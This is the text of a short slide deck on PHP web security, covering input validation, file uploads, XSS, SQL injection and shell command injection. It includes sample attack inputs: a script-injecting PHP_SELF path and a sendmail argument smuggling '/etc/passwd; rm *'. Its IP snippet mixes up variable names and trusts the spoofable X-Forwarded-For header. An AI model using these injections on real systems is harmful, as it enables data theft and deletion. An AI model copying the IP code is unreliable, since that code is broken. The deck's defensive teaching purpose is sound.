PHP Security by Uttam Kumar Email:- [email_address] Mobile:- 9730791715

What is Security? measurement… safety… protection…

measurement…

safety…

protection…

Secure Web Applications web security issues have to do with: hacker attacks denial of service server hijacking common threats compromise of data

web security issues have to do with:

hacker attacks

denial of service

server hijacking

common threats

compromise of data

PHP & Security a growing language… a major concern…

a growing language…

a major concern…

Never trust the web… Input data validation register_globals = OFF $_REQUEST[] big NO NO … type casting input data No isNumeric() if data is numeric [locale problem] regularExp if data is string Path validation Always use basename()

Input data validation

register_globals = OFF

$_REQUEST[] big NO NO …

type casting input data

No isNumeric() if data is numeric [locale problem]

regularExp if data is string

Path validation

Always use basename()

Never trust the web… Content size validation use server side max length validation File Upload Check destination file size with $_FILES[‘name’][‘size’] I think Browser MIME header is reliable right ? Use getImageSize() in case of image External source upload like Avtar Make a local copy if path/of/file submitted from a URL.

Content size validation

use server side max length validation

File Upload

Check destination file size with $_FILES[‘name’][‘size’]

I think Browser MIME header is reliable right ?

Use getImageSize() in case of image

External source upload like Avtar

Make a local copy if path/of/file submitted from a URL.

XSS attack Can lead to embarrassment. Session take-over. Password theft. User tracking by 3 rd parties

Can lead to embarrassment.

Session take-over.

Password theft.

User tracking by 3 rd parties

XSS attack Prevention is better than cure Use striptags() No tag allowance please Use htmlentities() Is $_SERVER safe ? Can be set… Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo IP based info Use HTTP_X_FORWARDED_FOR Use long2ip() $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); $sValidIp = long2ip(ip2long(array_pop($ipss)));

Prevention is better than cure

Use striptags()

No tag allowance please

Use htmlentities()

Is $_SERVER safe ?

Can be set…

Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo

$_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;

$_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo

IP based info

Use HTTP_X_FORWARDED_FOR

Use long2ip()

$aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);

$sValidIp = long2ip(ip2long(array_pop($ipss)));

SQL Injection WWW Arbitrary query execution Removal of data. Modification of existing values. Denial of service. Arbitrary data injection.

Arbitrary query execution

Removal of data.

Modification of existing values.

Denial of service.

Arbitrary data injection.

Calling External Programs Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands. <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);

Questions…????

Thank You !!